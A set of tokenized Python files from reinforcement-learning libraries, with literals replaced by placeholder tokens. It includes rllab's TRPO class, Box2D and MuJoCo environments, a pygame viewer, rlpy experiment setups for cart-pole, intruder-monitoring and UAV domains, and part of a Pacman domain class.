. File ( args . gen_tasks . actionfile , '<STR_LIT:r>' ) <EOL> actions_root , actions_ext = os . path . splitext ( args . gen_tasks . actionfile ) <EOL> GlobalVars . actions_cache = h5py . File ( actions_root + '<STR_LIT>' + actions_ext , '<STR_LIT:a>' ) <EOL> def setup_lfd_environment_sim ( args ) : <EOL> actions = h5py . File ( args . gen_tasks . actionfile , '<STR_LIT:r>' ) <EOL> init_rope_xyz , init_joint_names , init_joint_values = sim_util . load_fake_data_segment ( actions , args . gen_tasks . fake_data_segment , args . gen_tasks . fake_data_transform ) <EOL> table_height = init_rope_xyz [ : , <NUM_LIT:2> ] . mean ( ) - <NUM_LIT> <EOL> sim_objs = [ ] <EOL> sim_objs . append ( BoxSimulationObject ( "<STR_LIT>" , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , table_height + ( - <NUM_LIT> + <NUM_LIT> ) ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , dynamic = False ) ) <EOL> sim = DynamicSimulation ( ) <EOL> world = sim <EOL> sim . add_objects ( sim_objs ) <EOL> if args . animation : <EOL> viewer = trajoptpy . GetViewer ( sim . env ) <EOL> if os . path . isfile ( args . window_prop_file ) and os . path . isfile ( args . camera_matrix_file ) : <EOL> print "<STR_LIT>" <EOL> window_prop = np . loadtxt ( args . window_prop_file ) <EOL> camera_matrix = np . loadtxt ( args . 
camera_matrix_file ) <EOL> try : <EOL> viewer . SetWindowProp ( * window_prop ) <EOL> viewer . SetCameraManipulatorMatrix ( camera_matrix ) <EOL> except : <EOL> print "<STR_LIT>" <EOL> else : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> viewer . Idle ( ) <EOL> print "<STR_LIT>" <EOL> try : <EOL> window_prop = viewer . GetWindowProp ( ) <EOL> camera_matrix = viewer . GetCameraManipulatorMatrix ( ) <EOL> np . savetxt ( args . window_prop_file , window_prop , fmt = '<STR_LIT>' ) <EOL> np . savetxt ( args . camera_matrix_file , camera_matrix ) <EOL> except : <EOL> print "<STR_LIT>" <EOL> viewer . Step ( ) <EOL> return sim <EOL> def main ( ) : <EOL> args = parse_input_args ( ) <EOL> setup_log_file ( args ) <EOL> set_global_vars ( args ) <EOL> sim = setup_lfd_environment_sim ( args ) <EOL> if args . subparser_name == "<STR_LIT>" : <EOL> start = time . time ( ) <EOL> gen_task_file ( args , sim ) <EOL> print "<STR_LIT>" . format ( time . time ( ) - start ) <EOL> else : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from rllab . algos . npo import NPO <EOL> from rllab . optimizers . conjugate_gradient_optimizer import ConjugateGradientOptimizer <EOL> from rllab . core . serializable import Serializable <EOL> class TRPO ( NPO , Serializable ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( <EOL> self , <EOL> optimizer = None , <EOL> optimizer_args = None , <EOL> ** kwargs ) : <EOL> Serializable . quick_init ( self , locals ( ) ) <EOL> if optimizer is None : <EOL> if optimizer_args is None : <EOL> optimizer_args = dict ( ) <EOL> optimizer = ConjugateGradientOptimizer ( ** optimizer_args ) <EOL> super ( TRPO , self ) . __init__ ( optimizer = optimizer , ** kwargs ) </s>
<s> import numpy as np <EOL> from rllab . envs . box2d . parser import find_body <EOL> from rllab . core . serializable import Serializable <EOL> from rllab . envs . box2d . box2d_env import Box2DEnv <EOL> from rllab . misc import autoargs <EOL> from rllab . misc . overrides import overrides <EOL> class DoublePendulumEnv ( Box2DEnv , Serializable ) : <EOL> @ autoargs . inherit ( Box2DEnv . __init__ ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs [ "<STR_LIT>" ] = kwargs . get ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> if kwargs . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" , False ) : <EOL> self . link_len = ( np . random . rand ( ) - <NUM_LIT:0.5> ) + <NUM_LIT:1> <EOL> else : <EOL> self . link_len = <NUM_LIT:1> <EOL> kwargs [ "<STR_LIT>" ] = kwargs . get ( "<STR_LIT>" , { } ) <EOL> kwargs [ "<STR_LIT>" ] [ "<STR_LIT>" ] = self . link_len <EOL> super ( DoublePendulumEnv , self ) . __init__ ( <EOL> self . model_path ( "<STR_LIT>" ) , <EOL> * args , ** kwargs <EOL> ) <EOL> self . link1 = find_body ( self . world , "<STR_LIT>" ) <EOL> self . link2 = find_body ( self . world , "<STR_LIT>" ) <EOL> Serializable . __init__ ( self , * args , ** kwargs ) <EOL> @ overrides <EOL> def reset ( self ) : <EOL> self . _set_state ( self . initial_state ) <EOL> self . _invalidate_state_caches ( ) <EOL> stds = np . array ( [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> pos1 , pos2 , v1 , v2 = np . random . randn ( * stds . shape ) * stds <EOL> self . link1 . angle = pos1 <EOL> self . link2 . angle = pos2 <EOL> self . link1 . angularVelocity = v1 <EOL> self . link2 . angularVelocity = v2 <EOL> return self . get_current_obs ( ) <EOL> def get_tip_pos ( self ) : <EOL> cur_center_pos = self . link2 . position <EOL> cur_angle = self . link2 . angle <EOL> cur_pos = ( <EOL> cur_center_pos [ <NUM_LIT:0> ] - self . link_len * np . sin ( cur_angle ) , <EOL> cur_center_pos [ <NUM_LIT:1> ] - self . link_len * np . 
cos ( cur_angle ) <EOL> ) <EOL> return cur_pos <EOL> @ overrides <EOL> def compute_reward ( self , action ) : <EOL> yield <EOL> tgt_pos = np . asarray ( [ <NUM_LIT:0> , self . link_len * <NUM_LIT:2> ] ) <EOL> cur_pos = self . get_tip_pos ( ) <EOL> dist = np . linalg . norm ( cur_pos - tgt_pos ) <EOL> yield - dist <EOL> def is_current_done ( self ) : <EOL> return False </s>
<s> from rllab . envs . mujoco . maze . maze_env import MazeEnv <EOL> from rllab . envs . mujoco . swimmer_env import SwimmerEnv <EOL> class SwimmerMazeEnv ( MazeEnv ) : <EOL> MODEL_CLASS = SwimmerEnv <EOL> ORI_IND = <NUM_LIT:2> <EOL> MAZE_HEIGHT = <NUM_LIT:0.5> <EOL> MAZE_SIZE_SCALING = <NUM_LIT:4> <EOL> MAZE_MAKE_CONTACTS = True </s>
<s> import pygame <EOL> import pygame . gfxdraw <EOL> import numpy as np <EOL> class Colors ( object ) : <EOL> black = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> white = ( <NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:255> ) <EOL> blue = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:255> ) <EOL> red = ( <NUM_LIT:255> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> green = ( <NUM_LIT:0> , <NUM_LIT:255> , <NUM_LIT:0> ) <EOL> class Viewer2D ( object ) : <EOL> def __init__ ( self , size = ( <NUM_LIT> , <NUM_LIT> ) , xlim = None , ylim = None ) : <EOL> pygame . init ( ) <EOL> screen = pygame . display . set_mode ( size ) <EOL> if xlim is None : <EOL> xlim = ( <NUM_LIT:0> , size [ <NUM_LIT:0> ] ) <EOL> if ylim is None : <EOL> ylim = ( <NUM_LIT:0> , size [ <NUM_LIT:1> ] ) <EOL> self . _screen = screen <EOL> self . _xlim = xlim <EOL> self . _ylim = ylim <EOL> @ property <EOL> def xlim ( self ) : <EOL> return self . _xlim <EOL> @ xlim . setter <EOL> def xlim ( self , value ) : <EOL> self . _xlim = value <EOL> @ property <EOL> def ylim ( self ) : <EOL> return self . _ylim <EOL> @ ylim . setter <EOL> def ylim ( self , value ) : <EOL> self . _ylim = value <EOL> def reset ( self ) : <EOL> self . fill ( Colors . white ) <EOL> def fill ( self , color ) : <EOL> self . screen . fill ( color ) <EOL> def scale_x ( self , world_x ) : <EOL> xmin , xmax = self . xlim <EOL> return int ( ( world_x - xmin ) * self . screen . get_width ( ) / ( xmax - xmin ) ) <EOL> def scale_y ( self , world_y ) : <EOL> ymin , ymax = self . ylim <EOL> return int ( ( self . screen . get_height ( ) - ( world_y - ymin ) * self . screen . get_height ( ) / ( ymax - ymin ) ) ) <EOL> def scale_point ( self , point ) : <EOL> x , y = point <EOL> return ( self . scale_x ( x ) , self . scale_y ( y ) ) <EOL> @ property <EOL> def scale_factor ( self ) : <EOL> xmin , xmax = self . xlim <EOL> ymin , ymax = self . ylim <EOL> return min ( self . screen . get_width ( ) / ( xmax - xmin ) , self . screen . 
get_height ( ) / ( ymax - ymin ) ) <EOL> def scale_size ( self , size ) : <EOL> if hasattr ( size , '<STR_LIT>' ) : <EOL> x , y = size <EOL> return ( self . scale_x ( x + self . xlim [ <NUM_LIT:0> ] ) , self . screen . get_height ( ) - self . scale_y ( y + self . ylim [ <NUM_LIT:0> ] ) ) <EOL> return size * self . scale_factor <EOL> def line ( self , color , p1 , p2 , width = None ) : <EOL> if width is None : <EOL> width = <NUM_LIT:1> <EOL> else : <EOL> width = int ( width * self . scale_factor ) <EOL> x1 , y1 = self . scale_point ( p1 ) <EOL> x2 , y2 = self . scale_point ( p2 ) <EOL> pygame . draw . line ( self . screen , color , ( x1 , y1 ) , ( x2 , y2 ) , width ) <EOL> def circle ( self , color , p , radius ) : <EOL> pygame . draw . circle ( self . screen , color , self . scale_point ( p ) , int ( self . scale_size ( radius ) ) ) <EOL> def rect ( self , color , center , size ) : <EOL> cx , cy = self . scale_point ( center ) <EOL> w , h = self . scale_size ( size ) <EOL> if len ( color ) > <NUM_LIT:3> : <EOL> s = pygame . Surface ( ( w , h ) , pygame . SRCALPHA ) <EOL> s . fill ( color ) <EOL> self . screen . blit ( s , ( cx - w / <NUM_LIT:2> , cy - h / <NUM_LIT:2> ) ) <EOL> else : <EOL> pygame . draw . rect ( self . screen , color , pygame . Rect ( cx - w / <NUM_LIT:2> , cy - h / <NUM_LIT:2> , w , h ) ) <EOL> def polygon ( self , color , points ) : <EOL> if len ( color ) > <NUM_LIT:3> : <EOL> s = pygame . Surface ( ( self . screen . get_width ( ) , self . screen . get_height ( ) ) , pygame . SRCALPHA ) <EOL> s . fill ( ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> pygame . draw . polygon ( s , color , map ( self . scale_point , points ) ) <EOL> self . screen . blit ( s , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> else : <EOL> pygame . draw . polygon ( self . screen , color , map ( self . scale_point , points ) ) <EOL> @ property <EOL> def screen ( self ) : <EOL> return self . _screen <EOL> def loop_once ( self ) : <EOL> pygame . display . 
flip ( ) <EOL> def checker ( self , colors = [ Colors . white , Colors . black ] , granularity = <NUM_LIT:4> , offset = ( <NUM_LIT:0> , <NUM_LIT:0> ) ) : <EOL> screen_height = self . screen . get_height ( ) <EOL> screen_width = self . screen . get_width ( ) <EOL> screen_size = min ( screen_height , screen_width ) <EOL> checker_size = int ( screen_size / granularity ) <EOL> offset_x = self . scale_x ( offset [ <NUM_LIT:0> ] + self . xlim [ <NUM_LIT:0> ] ) <EOL> offset_y = self . scale_y ( offset [ <NUM_LIT:1> ] + self . ylim [ <NUM_LIT:0> ] ) <EOL> start_idx = int ( offset_x / checker_size ) + int ( offset_y / checker_size ) <EOL> offset_x = ( ( offset_x % checker_size ) + checker_size ) % checker_size <EOL> offset_y = ( ( offset_y % checker_size ) + checker_size ) % checker_size <EOL> for row in range ( - <NUM_LIT:1> , int ( np . ceil ( screen_height * <NUM_LIT:1.0> / checker_size ) ) + <NUM_LIT:1> ) : <EOL> for col in range ( - <NUM_LIT:1> , int ( np . ceil ( screen_width * <NUM_LIT:1.0> / checker_size ) ) + <NUM_LIT:1> ) : <EOL> the_square = ( col * checker_size + offset_x , row * checker_size + offset_y , checker_size , checker_size ) <EOL> self . screen . fill ( colors [ ( start_idx + row + col ) % <NUM_LIT:2> ] , the_square ) <EOL> def pause ( self ) : <EOL> print "<STR_LIT>" <EOL> while True : <EOL> event = pygame . event . wait ( ) <EOL> if event . type == pygame . KEYDOWN : <EOL> break <EOL> print "<STR_LIT>" </s>
<s> from rllab . core . parameterized import Parameterized <EOL> class QFunction ( Parameterized ) : <EOL> pass </s>
<s> import os <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> from rllab . algos . vpg import VPG <EOL> from rllab . envs . box2d . cartpole_env import CartpoleEnv <EOL> from rllab . baselines . zero_baseline import ZeroBaseline <EOL> from rllab . baselines . linear_feature_baseline import LinearFeatureBaseline <EOL> from rllab . baselines . gaussian_mlp_baseline import GaussianMLPBaseline <EOL> from rllab . policies . gaussian_mlp_policy import GaussianMLPPolicy <EOL> from nose2 import tools <EOL> baselines = [ ZeroBaseline , LinearFeatureBaseline , GaussianMLPBaseline ] <EOL> @ tools . params ( * baselines ) <EOL> def test_baseline ( baseline_cls ) : <EOL> env = CartpoleEnv ( ) <EOL> policy = GaussianMLPPolicy ( env_spec = env . spec , hidden_sizes = ( <NUM_LIT:6> , ) ) <EOL> baseline = baseline_cls ( env_spec = env . spec ) <EOL> algo = VPG ( <EOL> env = env , policy = policy , baseline = baseline , <EOL> n_itr = <NUM_LIT:1> , batch_size = <NUM_LIT:1000> , max_path_length = <NUM_LIT:100> <EOL> ) <EOL> algo . train ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> from rlpy . Domains import InfCartPoleBalance <EOL> from rlpy . Agents import Greedy_GQ , SARSA , Q_Learning <EOL> from rlpy . Representations import * <EOL> from rlpy . Policies import eGreedy <EOL> from rlpy . Experiments import Experiment <EOL> import numpy as np <EOL> from hyperopt import hp <EOL> param_space = { '<STR_LIT>' : hp . quniform ( "<STR_LIT>" , <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : <EOL> hp . loguniform ( <EOL> "<STR_LIT>" , <EOL> np . log ( <NUM_LIT> ) , <EOL> np . log ( <NUM_LIT> ) ) , <EOL> '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT> ) ) , <EOL> '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT:1> ) ) } <EOL> def make_experiment ( <EOL> exp_id = <NUM_LIT:1> , path = "<STR_LIT>" , <EOL> discover_threshold = <NUM_LIT> , <EOL> lambda_ = <NUM_LIT:0.> , <EOL> boyan_N0 = <NUM_LIT> , <EOL> initial_learn_rate = <NUM_LIT> , <EOL> discretization = <NUM_LIT> ) : <EOL> opt = { } <EOL> opt [ "<STR_LIT:path>" ] = path <EOL> opt [ "<STR_LIT>" ] = exp_id <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT> <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT:20> <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT:10> <EOL> sparsify = True <EOL> kappa = <NUM_LIT> <EOL> domain = InfCartPoleBalance ( ) <EOL> opt [ "<STR_LIT>" ] = domain <EOL> initial_rep = IndependentDiscretization ( <EOL> domain , <EOL> discretization = discretization ) <EOL> representation = iFDD ( domain , discover_threshold , initial_rep , <EOL> sparsify = sparsify , <EOL> discretization = discretization , <EOL> useCache = True , <EOL> iFDDPlus = <NUM_LIT:1> - kappa ) <EOL> policy = eGreedy ( representation , epsilon = <NUM_LIT:0.1> ) <EOL> opt [ "<STR_LIT>" ] = SARSA ( policy , representation , <EOL> lambda_ = lambda_ , <EOL> discount_factor = domain . 
discount_factor , <EOL> initial_learn_rate = initial_learn_rate , <EOL> learn_rate_decay_mode = "<STR_LIT>" , boyan_N0 = boyan_N0 ) <EOL> experiment = Experiment ( ** opt ) <EOL> return experiment <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> experiment = make_experiment ( <NUM_LIT:1> ) <EOL> experiment . run ( ) <EOL> experiment . save ( ) </s>
<s> """<STR_LIT>""" <EOL> from rlpy . Domains . IntruderMonitoring import IntruderMonitoring <EOL> from rlpy . Agents import SARSA <EOL> from rlpy . Representations import iFDD , IndependentDiscretization <EOL> from rlpy . Policies import eGreedy <EOL> from rlpy . Experiments import Experiment <EOL> import numpy as np <EOL> from hyperopt import hp <EOL> param_space = { '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , <EOL> np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT> ) ) , <EOL> '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT> ) ) , <EOL> '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT:1> ) ) } <EOL> def make_experiment ( <EOL> exp_id = <NUM_LIT:1> , path = "<STR_LIT>" , <EOL> discover_threshold = <NUM_LIT:1.0> , <EOL> lambda_ = <NUM_LIT:0.> , <EOL> boyan_N0 = <NUM_LIT> , <EOL> initial_learn_rate = <NUM_LIT> ) : <EOL> opt = { } <EOL> opt [ "<STR_LIT:path>" ] = path <EOL> opt [ "<STR_LIT>" ] = exp_id <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT> <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT:10> <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT:1> <EOL> sparsify = <NUM_LIT:1> <EOL> ifddeps = <NUM_LIT> <EOL> domain = IntruderMonitoring ( ) <EOL> opt [ "<STR_LIT>" ] = domain <EOL> initial_rep = IndependentDiscretization ( domain ) <EOL> representation = iFDD ( domain , discover_threshold , initial_rep , <EOL> sparsify = sparsify , <EOL> useCache = True , <EOL> iFDDPlus = <NUM_LIT:1> - ifddeps ) <EOL> policy = eGreedy ( representation , epsilon = <NUM_LIT:0.1> ) <EOL> opt [ "<STR_LIT>" ] = SARSA ( <EOL> policy , representation , discount_factor = domain . discount_factor , <EOL> lambda_ = lambda_ , initial_learn_rate = initial_learn_rate , <EOL> learn_rate_decay_mode = "<STR_LIT>" , boyan_N0 = boyan_N0 ) <EOL> experiment = Experiment ( ** opt ) <EOL> return experiment <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from rlpy . Tools . 
run import run_profiled <EOL> experiment = make_experiment ( <NUM_LIT:1> ) <EOL> experiment . run ( visualize_steps = False , visualize_performance = <NUM_LIT:10> , <EOL> visualize_learning = True ) </s>
<s> from rlpy . Domains import PST <EOL> from rlpy . Agents import Q_Learning <EOL> from rlpy . Representations import * <EOL> from rlpy . Policies import eGreedy <EOL> from rlpy . Experiments import Experiment <EOL> import numpy as np <EOL> from hyperopt import hp <EOL> param_space = { <EOL> '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , <EOL> np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT> ) ) , <EOL> '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT> ) ) , <EOL> '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT:1> ) ) } <EOL> def make_experiment ( <EOL> exp_id = <NUM_LIT:1> , path = "<STR_LIT>" , <EOL> discover_threshold = <NUM_LIT> , <EOL> lambda_ = <NUM_LIT:0.> , <EOL> boyan_N0 = <NUM_LIT> , <EOL> initial_learn_rate = <NUM_LIT> ) : <EOL> opt = { } <EOL> opt [ "<STR_LIT:path>" ] = path <EOL> opt [ "<STR_LIT>" ] = exp_id <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT> <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT:30> <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT:10> <EOL> sparsify = <NUM_LIT:1> <EOL> kappa = <NUM_LIT> <EOL> domain = PST ( NUM_UAV = <NUM_LIT:4> ) <EOL> opt [ "<STR_LIT>" ] = domain <EOL> initial_rep = IndependentDiscretization ( domain ) <EOL> representation = iFDD ( domain , discover_threshold , initial_rep , <EOL> sparsify = sparsify , <EOL> useCache = True , <EOL> iFDDPlus = <NUM_LIT:1> - kappa ) <EOL> policy = eGreedy ( representation , epsilon = <NUM_LIT:0.1> ) <EOL> opt [ "<STR_LIT>" ] = Q_Learning ( policy , representation , <EOL> discount_factor = domain . discount_factor , <EOL> lambda_ = lambda_ , initial_learn_rate = initial_learn_rate , <EOL> learn_rate_decay_mode = "<STR_LIT>" , boyan_N0 = boyan_N0 ) <EOL> experiment = Experiment ( ** opt ) <EOL> return experiment <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from rlpy . Tools . run import run_profiled <EOL> run_profiled ( make_experiment ) </s>
<s> """<STR_LIT>""" <EOL> from rlpy . Tools import __rlpy_location__ <EOL> from . Domain import Domain <EOL> from . PacmanPackage import layout , pacman , game , ghostAgents <EOL> from . PacmanPackage import graphicsDisplay <EOL> import numpy as np <EOL> from copy import deepcopy <EOL> import os <EOL> import time <EOL> __copyright__ = "<STR_LIT>" <EOL> __credits__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] <EOL> __license__ = "<STR_LIT>" <EOL> __author__ = "<STR_LIT>" <EOL> class Pacman ( Domain ) : <EOL> """<STR_LIT>""" <EOL> _max_scared_time = <NUM_LIT> <EOL> actions = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> actions_num = <NUM_LIT:5> <EOL> episodeCap = <NUM_LIT:1000> <EOL> default_layout_dir = os . path . join ( <EOL> __rlpy_location__ , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> def __init__ ( self , noise = <NUM_LIT> , timeout = <NUM_LIT:30> , <EOL> layoutFile = os . path . join ( <EOL> default_layout_dir , '<STR_LIT>' ) , <EOL> numGhostAgents = <NUM_LIT:1000> ) : <EOL> """<STR_LIT>""" <EOL> self . noise = noise <EOL> self . layoutFile = layoutFile <EOL> layout_file_content = self . _tryToLoad ( self . layoutFile ) <EOL> self . layout = layout . Layout ( layout_file_content ) <EOL> self . numGhostAgents = numGhostAgents <EOL> self . game_state = pacman . GameState ( ) <EOL> self . game_rules = pacman . ClassicGameRules ( timeout ) <EOL> self . layout_copy = deepcopy ( self . layout ) <EOL> self . game_state . data . initialize ( self . layout_copy , self . numGhostAgents ) <EOL> self . num_total_food = len ( self . layout_copy . food . asList ( ) ) <EOL> self . num_total_capsules = len ( self . layout_copy . capsules ) <EOL> self . _defaultSettings ( ) <EOL> self . restartGraphics = None <EOL> self . timerswitch = False <EOL> self . savedtimer = None <EOL> self . gameDisplay = None <EOL> self . _set_statespace_limits ( ) <EOL> super ( Pacman , self ) . 
__init__ ( ) <EOL> def _set_statespace_limits ( self ) : <EOL> statespace_limits = [ ] <EOL> statespace_limits . append ( [ <NUM_LIT:1> , self . layout . width - <NUM_LIT:2> ] ) <EOL> statespace_limits . append ( [ <NUM_LIT:1> , self . layout . height - <NUM_LIT:2> ] ) <EOL> for ghost in self . game_state . data . agentStates [ <NUM_LIT:1> : ] : <EOL> statespace_limits . append ( [ <NUM_LIT:1> , self . layout . width - <NUM_LIT:2> ] ) <EOL> statespace_limits . append ( [ <NUM_LIT:1> , self . layout . height - <NUM_LIT:2> ] ) <EOL> statespace_limits . append ( [ <NUM_LIT:0> , self . _max_scared_time ] ) <EOL> statespace_limits += [ [ <NUM_LIT:0> , <NUM_LIT:1> ] ] * ( <EOL> self . num_total_food + self . num_total_capsules ) <EOL> self . statespace_limits = np . array ( statespace_limits , dtype = "<STR_LIT:float>" ) <EOL> def _set_state ( self , s ) : <EOL> """<STR_LIT>""" <EOL> data = self . game_state . data <EOL> agent_states = data . agentStates <EOL> agent_states . configuration . pos = ( s [ <NUM_LIT:0> ] , s [ <NUM_LIT:1> ] ) <EOL> num_ghosts = len ( agent_states ) - <NUM_LIT:1> <EOL> for i in range ( <NUM_LIT:1> , num_ghosts + <NUM_LIT:1> ) : <EOL> part_s = s [ ( <NUM_LIT:3> * i ) - <NUM_LIT:1> : <NUM_LIT:3> * i ] <EOL> agent_states [ i ] . configuration . pos = ( part_s [ <NUM_LIT:0> ] , part_s [ <NUM_LIT:1> ] ) <EOL> agent_states [ i ] . scaredTimer = part_s [ <NUM_LIT:2> ] <EOL> s_food = s [ ( num_ghosts + <NUM_LIT:1> ) * <NUM_LIT:3> : ] <EOL> x = <NUM_LIT:0> <EOL> y = <NUM_LIT:0> <EOL> i = <NUM_LIT:0> <EOL> data . capsules = [ ] <EOL> for char in str ( self . layout_copy ) : <EOL> if char == "<STR_LIT:.>" : <EOL> data . food [ x ] [ y ] = bool ( s_food [ i ] ) <EOL> i += <NUM_LIT:1> <EOL> elif char == "<STR_LIT:o>" : <EOL> coord = ( x , self . layout_copy . height - y ) <EOL> if s_food [ i ] : <EOL> data . capsules . 
append ( coord ) <EOL> i += <NUM_LIT:1> <EOL> elif char == "<STR_LIT:\n>" : <EOL> y += <NUM_LIT:1> <EOL> x = - <NUM_LIT:1> <EOL> x += <NUM_LIT:1> <EOL> def _get_state ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . game_state . data <EOL> agent_states = self . game_state . data . agentStates <EOL> num_ghosts = len ( agent_states ) - <NUM_LIT:1> <EOL> s = np . zeros ( <EOL> <NUM_LIT:2> + num_ghosts * <NUM_LIT:3> + self . num_total_food + self . num_total_capsules ) <EOL> s [ : <NUM_LIT:2> ] = agent_states [ <NUM_LIT:0> ] . configuration . pos <EOL> for i in range ( num_ghosts ) : <EOL> s [ <NUM_LIT:2> + i * <NUM_LIT:3> : <NUM_LIT:2> + i * <NUM_LIT:3> + <NUM_LIT:2> ] = agent_states [ i + <NUM_LIT:1> ] . configuration . pos <EOL> s [ <NUM_LIT:2> + i * <NUM_LIT:3> + <NUM_LIT:2> ] = agent_states [ i + <NUM_LIT:1> ] . scaredTimer <EOL> i = <NUM_LIT:2> + num_ghosts * <NUM_LIT:3> <EOL> x = <NUM_LIT:0> <EOL> y = <NUM_LIT:0> <EOL> for char in str ( self . layout_copy ) : <EOL> if char == "<STR_LIT:.>" : <EOL> s [ i ] = data . food [ x ] [ y ] <EOL> i += <NUM_LIT:1> <EOL> elif char == "<STR_LIT:\n>" : <EOL> y += <NUM_LIT:1> <EOL> x = - <NUM_LIT:1> <EOL> elif char == "<STR_LIT:o>" : <EOL> coord = ( x , self . layout_copy . height - y ) <EOL> if coord in data . capsules : <EOL> s [ i ] = <NUM_LIT:1.> <EOL> i += <NUM_LIT:1> <EOL> x += <NUM_LIT:1> <EOL> return s <EOL> state = property ( _get_state , _set_state ) <EOL> def showDomain ( self , a , s = None ) : <EOL> if s is not None : <EOL> errStr = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' <EOL> raise Exception ( errStr ) <EOL> s = self . game_state <EOL> if self . gameDisplay is None : <EOL> self . gameDisplay = graphicsDisplay . PacmanGraphics ( ) <EOL> self . gameDisplay . startGraphics ( self ) <EOL> self . gameDisplay . drawStaticObjects ( s . data ) <EOL> self . gameDisplay . drawAgentObjects ( s . data ) <EOL> elif self . _cleanup_graphics : <EOL> self . _cleanup_graphics = False <EOL> self . gameDisplay . 
removeAllFood ( ) <EOL> self . gameDisplay . removeAllCapsules ( ) <EOL> self . gameDisplay . food = self . gameDisplay . drawFood ( <EOL> self . gameDisplay . layout . food ) <EOL> self . gameDisplay . capsules = self . gameDisplay . drawCapsules ( <EOL> self . gameDisplay . layout . capsules ) <EOL> s . data . layout . food = s . data . food <EOL> for agent in range ( len ( s . data . agentStates ) ) : <EOL> s . data . _agentMoved = agent <EOL> self . gameDisplay . update ( s . data ) <EOL> s . _foodEaten = None <EOL> s . _capsuleEaten = None <EOL> def step ( self , a ) : <EOL> """<STR_LIT>""" <EOL> if self . random_state . random_sample ( ) < self . noise : <EOL> a = self . random_state . choice ( self . possibleActions ( ) ) <EOL> a = self . actions [ a ] <EOL> next_state_p = self . game_state . generateSuccessor ( <NUM_LIT:0> , a ) <EOL> next_state = next_state_p <EOL> for i in range ( <NUM_LIT:1> , len ( self . game_state . data . agentStates ) ) : <EOL> if next_state . isWin ( ) or next_state . isLose ( ) : <EOL> break <EOL> ghostOptions = pacman . GhostRules . getLegalActions ( next_state , i ) <EOL> randomAction_ind = self . random_state . randint ( len ( ghostOptions ) ) <EOL> randomAction = ghostOptions [ randomAction_ind ] <EOL> next_state = next_state . generateSuccessor ( i , randomAction ) <EOL> next_state . data . _foodEaten = next_state_p . data . _foodEaten <EOL> next_state . data . _capsuleEaten = next_state_p . data . _capsuleEaten <EOL> r = next_state . data . score - self . game_state . data . score <EOL> self . game_state = next_state <EOL> terminal = self . isTerminal ( ) <EOL> return r , self . _get_state ( ) , terminal , self . possibleActions ( ) <EOL> def s0 ( self ) : <EOL> """<STR_LIT>""" <EOL> self . game_state = pacman . GameState ( ) <EOL> self . game_rules = pacman . ClassicGameRules ( timeout = <NUM_LIT:30> ) <EOL> self . layout_copy = deepcopy ( self . layout ) <EOL> self . game = self . game_rules . newGame ( <EOL> self . 
